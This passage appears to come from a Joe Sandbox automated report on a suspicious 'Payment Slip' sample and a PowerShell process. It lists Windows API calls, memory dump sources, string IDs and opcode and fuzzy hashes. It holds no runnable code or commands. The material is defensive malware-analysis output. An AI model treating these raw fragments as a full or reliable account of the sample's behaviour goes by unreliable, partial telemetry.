                                              • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A07
                                              • wsprintfW.USER32 ref: 00404A10
                                              • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A23
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: ItemTextlstrlenwsprintf
                                              • String ID: %u.%u%s%s
                                              • API String ID: 3540041739-3551169577
                                              • Opcode ID: 4296bb9edf2789e867a9d2459d6d531fcd7c7c1783075924c57ec8259cd97d31
                                              • Instruction ID: 11a56ec29d8e774b63c5a31ca8dd146b3e369a93441477fc7d09fda37b012288
                                              • Opcode Fuzzy Hash: 4296bb9edf2789e867a9d2459d6d531fcd7c7c1783075924c57ec8259cd97d31
                                              • Instruction Fuzzy Hash: 7011E273A002243BCB10A66D9C45EAF368D9BC6374F14423BFA69F61D1D9799C2186EC
                                              APIs
                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: MessageSend$Timeout
                                              • String ID: !
                                              • API String ID: 1777923405-2657877971
                                              • Opcode ID: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
                                              • Instruction ID: 4e2ee5f0d92934ddef816e72561913b102c535ce611946f90f9b6b3ff638ae8b
                                              • Opcode Fuzzy Hash: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
                                              • Instruction Fuzzy Hash: 2221A171A44208AEEF01AFB0C98AEAD7B75EF45308F10413AF602B61D1D6B8A941DB19
                                              APIs
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,: Completed,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405DDF
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405E00
                                              • RegCloseKey.ADVAPI32(?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405E23
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID: : Completed
                                              • API String ID: 3677997916-2954849223
                                              • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                              • Instruction ID: afa83f24152e7e9ce060601fd796842ff4531c7984e311905aa048a3366a239a
                                              • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                              • Instruction Fuzzy Hash: DC011A3115020AEADB218F56ED09EEB3BA8EF85354F00403AF945D6260D335DA64DBF9
                                              APIs
                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00405939
                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00405943
                                              • lstrcatW.KERNEL32(?,00409014), ref: 00405955
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405933
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: CharPrevlstrcatlstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 2659869361-823278215
                                              • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                              • Instruction ID: 44c8f02d27920c7d59b6ae10536407caccd7e36c496fb0f87730dad2d93a7b21
                                              • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                              • Instruction Fuzzy Hash: FFD05261101920AAC222AB488C04D9B67ACEE86301340002AF201B20A2CB7C2E428BFE
                                              APIs
                                              • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                              • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                              • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                              • String ID:
                                              • API String ID: 1404258612-0
                                              • Opcode ID: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
                                              • Instruction ID: 69d4cfede9788cc5a39dfd4732502e81c1ba8e36930914c0ac138746a00c9a3b
                                              • Opcode Fuzzy Hash: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
                                              • Instruction Fuzzy Hash: 27114875A00108BEDB00EFA5D945DAEBBBAEF04344F21407AF501F62E1E7349E50CB68
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 00405135
                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405186
                                                • Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: Window$CallMessageProcSendVisible
                                              • String ID:
                                              • API String ID: 3748168415-3916222277
                                              • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                              • Instruction ID: a693931b294d40b9fc88652aed0c21abafbc2ac9e0ef9b0e0ec3bcc5ba2f922e
                                              • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                              • Instruction Fuzzy Hash: B2019E71A00609FFDB215F51DD84F6B3726EB84350F508136FA007A2E1C37A8C929F6A
                                              APIs
                                              • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75922EE0,004037F4,75923420,0040361F,?), ref: 00403837
                                              • GlobalFree.KERNEL32(?), ref: 0040383E
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040382F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: Free$GlobalLibrary
                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 1100898210-823278215
                                              • Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                              • Instruction ID: 46cd0999c48b818ae3c50a5e697a2c548effd71f48cd6e5996984714d7197a8e
                                              • Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                              • Instruction Fuzzy Hash: 01E0C23390503057C7316F14ED05B1ABBE86F89B22F014076F9417B7A183746C528BED
                                              APIs
                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405985
                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405995
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: CharPrevlstrlen
                                              • String ID: C:\Users\user\Desktop
                                              • API String ID: 2709904686-1246513382
                                              • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                              • Instruction ID: 052b7d625f743090f45407db0d4342bedadcdb208645d65a5e8033f28458e035
                                              • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                              • Instruction Fuzzy Hash: 4DD05EB2400A20DAD3226B08DC009AFB3ACEF113107464466F841A21A5D7786D818BE9
                                              APIs
                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
                                              • lstrcmpiA.KERNEL32(00405CF3,00000000), ref: 00405AE1
                                              • CharNextA.USER32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF2
                                              • lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: lstrlen$CharNextlstrcmpi
                                              • String ID:
                                              • API String ID: 190613189-0
                                              • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                              • Instruction ID: 0e21c6ccf38cfde73736f548742f9065f02c2b70c8696d75456ee166b8786c13
                                              • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                              • Instruction Fuzzy Hash: 59F0C231604458AFCB12DBA4CD4099FBBA8EF06250B2140A6F801F7210D274FE019BA9
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2671317882.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_42a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5f49164904abeeb438e80ef0bcf6e932109374581edfbae1a4bf9eafc8efc0eb
                                              • Instruction ID: ce1dd50ef8d164c27979ee8e4b8617cd796fee5fb80917734b313a071fdf7baf
                                              • Opcode Fuzzy Hash: 5f49164904abeeb438e80ef0bcf6e932109374581edfbae1a4bf9eafc8efc0eb
                                              • Instruction Fuzzy Hash: 9CB16B70F1020ADFDB10CFA8C98579DBBF2BF88314F158529D815E7254EB74A856CB81
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2671317882.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_42a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 028bef53a281133861e92814f2c473493cc7ef680f4bf8b8caada0abdb8f8f07
                                              • Instruction ID: abf15b1506386d10c69d26aab5df3ebd06b922f356418152e1cb3e284762a491
                                              • Opcode Fuzzy Hash: 028bef53a281133861e92814f2c473493cc7ef680f4bf8b8caada0abdb8f8f07
                                              • Instruction Fuzzy Hash: DCB19F70F1020A9FDF10CFA8CA8579DBBF2AF88714F198529D815E7254EB78A855CB81
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (frl$(frl$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq
                                              • API String ID: 0-2954483773
                                              • Opcode ID: 6e5ea1a9fc6f1aee643dcead165569a3157b1145845b820d609677a2d1d20e40
                                              • Instruction ID: bdf9708b4d8f803dd3f659447a4ccb6113e529eb63c3e64724b7bb793d507710
                                              • Opcode Fuzzy Hash: 6e5ea1a9fc6f1aee643dcead165569a3157b1145845b820d609677a2d1d20e40
                                              • Instruction Fuzzy Hash: 40A26FB0B01214CFDB65CFA8C455BA9BBB2AB94314F21816DD9059F382CB76ED81CF91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq
                                              • API String ID: 0-66516834
                                              • Opcode ID: da9f948a0fa9dd7082ec23e83c4ecc7f793fe7aa225d9d03a39cd9c76d0fd790
                                              • Instruction ID: 8a29ab74fcd5c872b0600b9b11a99b3fd051934697e2f0ff248a229dac6b05d7
                                              • Opcode Fuzzy Hash: da9f948a0fa9dd7082ec23e83c4ecc7f793fe7aa225d9d03a39cd9c76d0fd790
                                              • Instruction Fuzzy Hash: 1C827FB4B05254CFEB25CFA4C451B99BBB2EB84314F2181ADD905AB382C776ED81CF91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (frl$(frl$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$x.ck$x.ck$-ck$-ck
                                              • API String ID: 0-2844645855
                                              • Opcode ID: a12f721fa1fe6013fecf8dcf73e44aedf8216596a7f19525d85f5b6ef74d247b
                                              • Instruction ID: 6cebcd983a65275ca25816ee8e82e96351d34da4d387d94fe006c23322eb0684
                                              • Opcode Fuzzy Hash: a12f721fa1fe6013fecf8dcf73e44aedf8216596a7f19525d85f5b6ef74d247b
                                              • Instruction Fuzzy Hash: A2627FB4B002159FDB54CB98C941B5ABBB2EB84314F11C499D909AF391CB72ED85CF92
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'cq$4'cq$4'cq$4'cq$$cq$$cq$$cq
                                              • API String ID: 0-408270263
                                              • Opcode ID: 3b5c857057115ba549e686950385e6dcbffaf714a86eb305912d76ed1adf4f06
                                              • Instruction ID: bc66854d639c256121aec9b67984c3e1532428695acd44a2d7c558b6f40d52e1
                                              • Opcode Fuzzy Hash: 3b5c857057115ba549e686950385e6dcbffaf714a86eb305912d76ed1adf4f06
                                              • Instruction Fuzzy Hash: AEA109B2B14206CFCB16CEA8C4016BA7BABAF95310F15846ED815CF2D5DB35D943CBA1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (frl$4'cq$4'cq$x.ck$-ck
                                              • API String ID: 0-2081721105
                                              • Opcode ID: d514c8be7c9c0bec7520a49c49fea567ca837022ee6b16b65c9347e75654d4d2
                                              • Instruction ID: 1364eaf640a2cf676e4764d755f587f805cb5fb9189ed4ef642fba7837afe39e
                                              • Opcode Fuzzy Hash: d514c8be7c9c0bec7520a49c49fea567ca837022ee6b16b65c9347e75654d4d2
                                              • Instruction Fuzzy Hash: E6C1BBB0A04245CFDB15CFA8C561B9EBBB2EF99300F26C059E9056F395CB35E981CB91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'cq$4'cq$$cq$$cq$$cq
                                              • API String ID: 0-838516036
                                              • Opcode ID: 068a9920e3f9ae219f51a68bcd4fc7c548c0f50d2abab3ec208e0a07054f6221
                                              • Instruction ID: 344c55a0d26a11c7722370360326d79b8bd0980264a4e0b03a16a08492f03260
                                              • Opcode Fuzzy Hash: 068a9920e3f9ae219f51a68bcd4fc7c548c0f50d2abab3ec208e0a07054f6221
                                              • Instruction Fuzzy Hash: 7C71F8B1B00216DFCB19DFB88C012AABBA6AFD9210F14807ED945DB281DB31D951CBE1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'cq$4'cq$4'cq$4'cq
                                              • API String ID: 0-1446110543
                                              • Opcode ID: 07463f5f14de60b093fa2218791fec39ff884a9f5e8a4a0292bde5326ac1ad2a
